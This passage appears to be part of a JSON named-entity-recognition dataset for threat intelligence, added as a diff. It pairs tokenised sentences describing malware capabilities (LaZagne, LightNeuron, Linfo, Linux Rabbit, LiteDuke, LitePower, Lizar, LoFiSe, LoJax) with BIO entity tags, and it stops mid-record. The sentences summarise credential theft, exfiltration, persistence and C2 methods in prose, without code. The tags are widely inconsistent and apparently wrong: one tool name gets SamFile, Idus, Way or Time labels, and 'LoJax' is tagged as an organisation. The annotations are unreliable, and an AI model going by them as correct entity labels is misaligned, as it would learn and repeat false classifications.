+ { + "tokens": [ + "LaZagne", + "can", + "obtain", + "credentials", + "from", + "web", + "browsers", + "such", + "as", + "Google", + "Chrome,", + "Internet", + "Explorer,", + "and", + "Firefox." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "obtain", + "credentials", + "from", + "macOS", + "Keychains." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "perform", + "credential", + "dumping", + "from", + "LSA", + "secrets", + "to", + "obtain", + "account", + "and", + "password", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "perform", + "credential", + "dumping", + "from", + "memory", + "to", + "obtain", + "account", + "and", + "password", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "use", + "the", + "`<PID>/maps`", + "and", + "`<PID>/mem`", + "files", + "to", + "identify", + "regex", + "patterns", + "to", + "dump", + "cleartext", + "passwords", + "from", + "the", + "browser's", + "process", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "obtain", + "credentials", + "from", + "Vault", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "contains", + "a", + "function", + "to", + "encrypt", + "and", + "store", + "emails", + "that", + "it", + "collects." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "LightNeuron", + "can", + "be", + "configured", + "to", + "automatically", + "collect", + "files", + "under", + "a", + "specified", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "can", + "be", + "configured", + "to", + "automatically", + "exfiltrate", + "files", + "under", + "a", + "specified", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "can", + "collect", + "files", + "from", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "has", + "used", + "AES", + "and", + "XOR", + "to", + "decrypt", + "configuration", + "files", + "and", + "commands." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "encrypts", + "its", + "configuration", + "files", + "with", + "AES-256." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LightNeuron", + "exfiltrates", + "data", + "over", + "its", + "email", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "has", + "a", + "function", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "can", + "store", + "email", + "data", + "in", + "files", + "and", + "directories", + "specified", + "in", + "its", + "configuration,", + "such", + "as", + "<code>C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "uses", + "SMTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "has", + "used", + "filenames", + "associated", + "with", + "Exchange", + "and", + "Outlook", + "for", + "binary", + "and", + "configuration", + "files,", + "such", + "as", + "<code>winmail.dat</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "LightNeuron", + "is", + "capable", + "of", + "starting", + "a", + "process", + "using", + "CreateProcess." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "LightNeuron", + "collects", + "Exchange", + "emails", + "matching", + "rules", + "specified", + "in", + "its", + "configuration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "can", + "be", + "configured", + "to", + "exfiltrate", + "data", + "during", + "nighttime", + "or", + "working", + "hours." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "is", + "controlled", + "via", + "commands", + "that", + "are", + "embedded", + "into", + "PDFs", + "and", + "JPGs", + "using", + "steganographic", + "methods." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "uses", + "AES", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "gathers", + "the", + "victim", + "computer", + "name", + "using", + "the", + "Win32", + "API", + "call", + "<code>GetComputerName</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "gathers", + "information", + "about", + "network", + "adapters", + "using", + "the", + "Win32", + "API", + "call", + "<code>GetAdaptersInfo</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "is", + "capable", + "of", + "modifying", + "email", + "content,", + "headers,", + "and", + "attachments", + "during", + "transit." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "has", + "used", + "a", + "malicious", + "Microsoft", + "Exchange", + "transport", + "agent", + "for", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LightNeuron", + "is", + "capable", + "of", + "executing", + "commands", + "via", + "cmd.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "obtain", + "data", + "from", + "local", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "change", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "delete", + "files." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "list", + "contents", + "of", + "drives", + "and", + "search", + "for", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "download", + "files", + "onto", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "change", + "the", + "frequency", + "at", + "which", + "compromised", + "hosts", + "contact", + "remote", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "system", + "information." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Linfo", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "start", + "a", + "remote", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linux", + "Rabbit", + "sends", + "the", + "payload", + "from", + "the", + "C2", + "server", + "as", + "an", + "encoded", + "URL", + "parameter." + ], + "ner_tags": [ + "I-SamFile", + "I-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linux", + "Rabbit", + "attempts", + "to", + "gain", + "access", + "to", + "the", + "server", + "via", + "SSH." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Linux", + "Rabbit", + "brute", + "forces", + "SSH", + "passwords", + "in", + "order", + "to", + "attempt", + "to", + "gain", + "access", + "and", + "install", + "its", + "malware", + "onto", + "the", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linux", + "Rabbit", + "opens", + "a", + "socket", + "on", + "port", + "22", + "and", + "if", + "it", + "receives", + "a", + "response", + "it", + "attempts", + "to", + "obtain", + "the", + "machine's", + "hostname", + "and", + "Top-Level", + "Domain." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Linux", + "Rabbit", + "maintains", + "persistence", + "on", + "an", + "infected", + "machine", + "through", + "rc.local", + "and", + ".bashrc", + "files." + ], + "ner_tags": [ + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Linux", + "Rabbit", + "acquires", + "valid", + "SSH", + "accounts", + "through", + "brute", + "force." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "has", + "the", + "ability", + "to", + "decrypt", + "and", + "decode", + "multiple", + "layers", + "of", + "obfuscation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-Features", + "I-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "securely", + "delete", + "files", + "by", + "first", + "writing", + "random", + "data", + "to", + "the", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "has", + "the", + "ability", + "to", + "download", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "query", + "the", + "Registry", + "to", + "check", + "for", + "the", + "presence", + "of", + "<code>HKCU\\Software\\KasperskyLab</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "create", + "persistence", + "by", + "adding", + "a", + "shortcut", + "in", + "the", + "<code>CurrentVersion\\Run</code>", + "Registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "has", + "the", + "ability", + "to", + "check", + "for", + "the", + "presence", + "of", + "Kaspersky", + "security", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "has", + "been", + "packed", + "with", + "multiple", + "layers", + "of", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "has", + "used", + "image", + "files", + "to", + "hide", + "its", + "loader", + "component." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "enumerate", + "the", + "CPUID", + "and", + "BIOS", + "version", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "has", + "the", + "ability", + "to", + "discover", + "the", + "proxy", + "configuration", + "of", + "Firefox", + "and/or", + "Opera." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "enumerate", + "the", + "account", + "name", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "wait", + "30", + "seconds", + "before", + "executing", + "additional", + "code", + "if", + "security", + "software", + "is", + "detected." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LiteDuke", + "can", + "use", + "HTTP", + "GET", + "requests", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "send", + "collected", + "data,", + "including", + "screenshots,", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "has", + "the", + "ability", + "to", + "download", + "payloads", + "containing", + "system", + "commands", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "use", + "various", + "API", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "use", + "a", + "PowerShell", + "script", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "query", + "the", + "Registry", + "for", + "keys", + "added", + "to", + "execute", + "COM", + "hijacking." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "create", + "a", + "scheduled", + "task", + "to", + "enable", + "persistence", + "mechanisms." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "take", + "system", + "screenshots", + "and", + "save", + "them", + "to", + "`%AppData%`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "identify", + "installed", + "AV", + "software." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "has", + "the", + "ability", + "to", + "list", + "local", + "drives", + "and", + "enumerate", + "the", + "OS", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "determine", + "if", + "the", + "current", + "user", + "has", + "admin", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LitePower", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "encrypted", + "data", + "before", + "sending", + "it", + "to", + "the", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "retrieve", + "browser", + "history", + "and", + "database", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "a", + "module", + "to", + "collect", + "usernames", + "and", + "passwords", + "stored", + "in", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "decrypt", + "its", + "configuration", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "used", + "the", + "PowerKatz", + "plugin", + "that", + "can", + "be", + "loaded", + "into", + "the", + "address", + "space", + "of", + "a", + "PowerShell", + "process", + "through", + "reflective", + "DLL", + "loading." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "collect", + "email", + "accounts", + "from", + "Microsoft", + "Outlook", + "and", + "Mozilla", + "Thunderbird." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "support", + "encrypted", + "communications", + "between", + "the", + "client", + "and", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "download", + "additional", + "plugins,", + "files,", + "and", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "run", + "Mimikatz", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "used", + "various", + "Windows", + "API", + "functions", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "execute", + "PE", + "files", + "in", + "the", + "address", + "space", + "of", + "the", + "specified", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "used", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "a", + "plugin", + "designed", + "to", + "obtain", + "a", + "list", + "of", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "migrate", + "the", + "loader", + "into", + "another", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "I-OffAct", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "take", + "JPEG", + "screenshots", + "of", + "an", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "search", + "for", + "processes", + "associated", + "with", + "an", + "anti-virus", + "product", + "from", + "list." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "collect", + "the", + "computer", + "name", + "from", + "the", + "machine,." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "retrieve", + "network", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "a", + "plugin", + "to", + "retrieve", + "information", + "about", + "all", + "active", + "network", + "sessions", + "on", + "the", + "infected", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "can", + "collect", + "the", + "username", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "a", + "command", + "to", + "open", + "the", + "command-line", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lizar", + "has", + "a", + "plugin", + "that", + "can", + "retrieve", + "credentials", + "from", + "Internet", + "Explorer", + "and", + "Microsoft", + "Edge", + "using", + "`vaultcmd.exe`", + "and", + "another", + "that", + "can", + "collect", + "RDP", + "access", + "credentials", + "using", + "the", + "`CredEnumerateW`", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoFiSe", + "can", + "collect", + "files", + "into", + "password-protected", + "ZIP-archives", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoFiSe", + "can", + "collect", + "all", + "the", + "files", + "from", + "the", + "working", + "directory", + "every", + "three", + "hours", + "and", + "place", + "them", + "into", + "a", + "password-protected", + "archive", + "for", + "further", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoFiSe", + "has", + "been", + "executed", + "as", + "a", + "file", + "named", + "DsNcDiag.dll", + "through", + "side-loading." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "LoFiSe", + "can", + "collect", + "files", + "of", + "interest", + "from", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoFiSe", + "can", + "monitor", + "the", + "file", + "system", + "to", + "identify", + "files", + "less", + "than", + "6.4", + "MB", + "in", + "size", + "with", + "file", + "extensions", + "including", + ".doc,", + ".docx,", + ".xls,", + ".xlsx,", + ".ppt,", + ".pptx,", + ".pdf,", + ".rtf,", + ".tif,", + ".odt,", + ".ods,", + ".odp,", + ".eml,", + "and", + ".msg." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "LoFiSe", + "can", + "save", + "files", + "to", + "be", + "evaluated", + "for", + "further", + "exfiltration", + "in", + "the", + "`C:\\Programdata\\Microsoft\\`", + "and", + "`C:\\windows\\temp\\`", + "folders." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoJax", + "has", + "modified", + "the", + "Registry", + "key", + "<code>‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session", + "Manager\\BootExecute’</code>", + "from", + "<code>‘autocheck", + "autochk", + "*’</code>", + "to", + "<code>‘autocheck", + "autoche", + "*’</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LoJax", + "has", + "loaded", + "an", + "embedded", + "NTFS", + "DXE", + "driver", + "to", + "be", + "able", + "to", + "access", + "and", + "write", + "to", + "NTFS", + "partitions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "LoJax", + "has", + "modified", + "the", + "Registry", + "key", + "<code>‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session", + "Manager\\BootExecute’</code>", + "from", + "<code>‘autocheck", + "autochk", + "*’</code>", + "to", + "<code>‘autocheck", + "autoche", + "*’</code>", + "in", + "order", + "to", + "execute", + "its", + "payload", + "during", + "Windows", + "startup." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 